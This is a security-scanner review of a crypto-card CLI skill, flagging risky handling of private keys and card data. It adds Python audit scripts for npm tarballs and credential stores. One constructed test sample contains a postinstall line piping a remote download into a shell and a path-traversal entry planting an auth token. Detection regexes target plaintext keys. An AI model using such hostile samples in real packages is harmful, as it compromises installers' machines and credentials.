Skill v1.0.1

ClawScan security

PayAll CLI · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

Suspicious · Mar 27, 2026, 1:12 AM
Verdict
suspicious
Confidence
medium
Model
gpt-5-mini
Summary
The skill’s instructions match a Payall CLI tool, but it encourages storing and passing extremely sensitive secrets (EVM private keys, full card PAN/CVV) and recommends installing an unverified npm package — reasonable for the claimed purpose but security-sensitive and worth caution.
Guidance
This skill appears to be what it says, but it handles very sensitive secrets and recommends installing an unverified npm package. Before installing or using it:
1) Verify the payall-cli package source (GitHub repo, maintainer, package contents) and audit the code if possible.
2) Do not pass your EVM private key on the command line to agents or automation; prefer hardware wallets or signed transactions when possible.
3) If you must use a private key, inspect how ~/.payall/ is protected and whether the claimed AES-256-GCM encryption and key management are implemented correctly.
4) Avoid using the --key auto-save option for long-term storage or in automated agents without strict isolation.
5) Treat any command that returns full card PAN/CVV JSON carefully and ensure it is used only in a secure, ephemeral context.
6) Consider running the CLI in a sandbox or VM and limit network access until you have validated telemetry/backend endpoints.
If you want, I can list concrete checks to validate the npm package and the on-disk credential format.

Review Dimensions

Purpose & Capability
ok · The name and description align with the runtime instructions: the SKILL.md documents running a payall CLI to manage crypto cards, view balances, top up with USDT, apply for cards, and perform wallet operations. The required capabilities are consistent with those actions.
Instruction Scope
concern · The instructions explicitly direct non-interactive use by passing --key <private_key> and saving the private key to disk (AES-256-GCM encrypted at ~/.payall/). They also describe a --reveal --json output that returns full card PAN/CVV/billing data. Both behaviors are within the stated purpose but involve highly sensitive secrets and persistent local storage: agents could be asked to supply private keys on the command line or to reveal full card data, which raises data-exfiltration and persistence risks. A key passed as a command-line argument is also exposed to anyone who can read the process list and, depending on how the agent runs commands, may be recorded in shell history or session logs.
Install Mechanism
note · The skill is instruction-only (no install spec), but SKILL.md tells users/agents to run 'npm install -g payall-cli' or 'bun install -g payall-cli'. Installing an unverified npm package is a supply-chain risk; the skill does not provide a homepage, repository, or verified source to validate the package before installation.
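One way to do the pre-install check the guidance asks for, as an added example that is not part of this scan output or of the payall-cli project: fetch the tarball with `npm pack <package>` (an npm command that downloads the package without installing it), then audit it offline for a missing repository field, install-time lifecycle scripts, native binaries, and entries that escape the package/ prefix. The sample manifests below describe a constructed package called example-cli, not the real payall-cli, so the findings it produces say nothing about that package; to audit the real one, pass the bytes of the .tgz that npm pack wrote.

```python
import io
import json
import tarfile
from typing import Optional

# Scripts npm runs automatically during install; code here executes on the
# installing machine before anyone has read the package.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish", "prepack")
NATIVE_SUFFIXES = (".node", ".so", ".dll", ".dylib")


def audit_npm_tarball(tarball: bytes) -> list[str]:
    """Return human-readable findings for an npm .tgz (as produced by `npm pack`)."""
    findings: list[str] = []
    with tarfile.open(fileobj=io.BytesIO(tarball), mode="r:gz") as tar:
        names = tar.getnames()
        try:
            manifest = json.load(tar.extractfile("package/package.json"))
        except KeyError:
            return ["no package/package.json in tarball"]

    # No repository field means the published code cannot be traced to a source tree.
    if not manifest.get("repository"):
        findings.append("no repository field: source cannot be traced to a repo")

    scripts = manifest.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        if hook in scripts:
            findings.append(f"lifecycle script runs on install: {hook} -> {scripts[hook]!r}")

    for name in names:
        parts = name.split("/")
        if not name.startswith("package/") or ".." in parts:
            # npm extracts everything under package/; anything else is a traversal attempt.
            findings.append(f"entry outside package/: {name!r}")
        elif name.endswith(NATIVE_SUFFIXES):
            findings.append(f"native binary shipped (not reviewable as source): {name!r}")
    return findings


def build_tarball(manifest: dict, extra_files: Optional[dict] = None) -> bytes:
    """Constructed stand-in for the .tgz that `npm pack` writes, so the audit runs offline."""
    files = {"package/package.json": json.dumps(manifest).encode()}
    files.update(extra_files or {})
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed sample packages (hypothetical "example-cli", not payall-cli).
CLEAN_MANIFEST = {
    "name": "example-cli",
    "version": "1.0.0",
    "repository": {"type": "git", "url": "https://github.com/example/example-cli"},
    "bin": {"example-cli": "bin/cli.js"},
    "scripts": {"test": "node test.js"},
}
CLEAN_FILES = {"package/bin/cli.js": b"#!/usr/bin/env node\nconsole.log('hi');\n"}

SUSPICIOUS_MANIFEST = {
    "name": "example-cli",
    "version": "1.0.0",
    "scripts": {"postinstall": "node scripts/setup.js"},
}
SUSPICIOUS_FILES = {
    "package/scripts/setup.js": b"require('child_process').exec('curl https://example.invalid | sh')\n",
    "package/build/helper.node": b"\x7fELF\x02\x01\x01",
    "../.npmrc": b"//registry.npmjs.org/:_authToken=stolen\n",
}

if __name__ == "__main__":
    for label, manifest, files in (("clean", CLEAN_MANIFEST, CLEAN_FILES),
                                   ("suspicious", SUSPICIOUS_MANIFEST, SUSPICIOUS_FILES)):
        print(label, audit_npm_tarball(build_tarball(manifest, files)) or ["no findings"])
```

The lifecycle-script check is the one that matters most for a global install: a postinstall hook runs with the installing user's privileges and, under `npm install -g`, often writes into system-wide paths, so reading those scripts (and any native modules they load) is the minimum before trusting the package with a wallet key.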
Credentials
note · The skill declares no environment variables, which is coherent, but it requires handling extremely sensitive secrets (EVM private key, full card PAN/CVV). Requesting a private key is proportionate to wallet operations, but the guidance to auto-save keys for agent use increases risk and should be treated as a high-sensitivity requirement.
Persistence & Privilege
note · The skill's always flag is false, and it does not request elevated platform privileges. However, the CLI's behavior of persisting encrypted credentials at ~/.payall/ and allowing auto-save via --key means secrets may persist on disk; that persistence is a security concern even if operationally justified.
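As an added example, not part of this scan output or of the CLI, here is the check a practitioner would run against a credential directory such as ~/.payall/ after the first auto-save: confirm the directory and its files are not group- or world-readable, and look for the two things that would show the AES-256-GCM claim is not being honoured, a bare 32-byte hex value (the shape of an EVM private key) or a JSON field named like a secret with a readable value. The real on-disk format of payall-cli is not known from SKILL.md, so the two sample stores below are constructed: one sloppy, one shaped the way an encrypted store should look.

```python
import json
import os
import re
import stat
import tempfile
from pathlib import Path

# A standalone 64-hex-digit token, optionally 0x-prefixed. Hex-encoded GCM output
# for a 32-byte key would be longer (ciphertext + 16-byte tag + nonce), so the
# look-around keeps the match from firing inside a longer hex blob. Heuristic only.
PRIVKEY_RE = re.compile(r"(?<![0-9a-fA-F])(?:0x)?[0-9a-fA-F]{64}(?![0-9a-fA-F])")
# JSON fields whose names suggest a secret stored as readable text.
SECRET_FIELD_RE = re.compile(r'"(privateKey|private_key|mnemonic|seed|cvv|pan)"\s*:\s*"[^"]+"', re.I)


def check_credential_dir(root) -> list[str]:
    """Return findings for a credential store; an empty list means nothing obvious is wrong."""
    root = Path(root)
    findings: list[str] = []
    if not root.exists():
        return [f"{root}: does not exist"]
    dir_mode = stat.S_IMODE(root.stat().st_mode)
    if dir_mode & 0o077:
        findings.append(f"{root.name}/: directory mode {dir_mode:04o} is accessible to group/other (expected 0700)")
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        mode = stat.S_IMODE(path.stat().st_mode)
        if mode & 0o077:
            findings.append(f"{path.name}: file mode {mode:04o} is readable by group/other (expected 0600)")
        try:
            text = path.read_bytes().decode("utf-8")
        except UnicodeDecodeError:
            # Opaque binary is what an encrypted blob looks like; nothing more to say offline.
            continue
        if PRIVKEY_RE.search(text):
            findings.append(f"{path.name}: contains a bare 32-byte hex value, consistent with a plaintext EVM private key")
        for m in SECRET_FIELD_RE.finditer(text):
            findings.append(f"{path.name}: plaintext secret field {m.group(1)!r}")
    return findings


def demo() -> dict:
    """Constructed sample stores (hypothetical layouts, not payall-cli's real format)."""
    with tempfile.TemporaryDirectory() as tmp:
        sloppy = Path(tmp) / "payall-plaintext"
        sloppy.mkdir()
        os.chmod(sloppy, 0o755)
        (sloppy / "wallet.json").write_text(json.dumps({"privateKey": "0x" + "ab" * 32}))
        os.chmod(sloppy / "wallet.json", 0o644)

        careful = Path(tmp) / "payall-encrypted"
        careful.mkdir()
        os.chmod(careful, 0o700)
        # Fixed bytes in the nonce || ciphertext || tag shape of AES-GCM output; invalid UTF-8 by construction.
        (careful / "wallet.enc").write_bytes(bytes(range(0x80, 0x80 + 12 + 32 + 16)))
        os.chmod(careful / "wallet.enc", 0o600)

        return {"sloppy": check_credential_dir(sloppy), "careful": check_credential_dir(careful)}


if __name__ == "__main__":
    for label, findings in demo().items():
        print(label, findings or ["no findings"])
```

Passing this check does not prove the encryption is sound: it cannot tell a properly derived key from a key hard-coded in the CLI, and a hex-encoded ciphertext of exactly 32 bytes would trip the private-key heuristic. It does catch the failure modes that matter most on a shared or agent-driven host, a world-readable store and a key written out in the clear, and a real review of the claim still means reading the CLI's key-derivation and storage code.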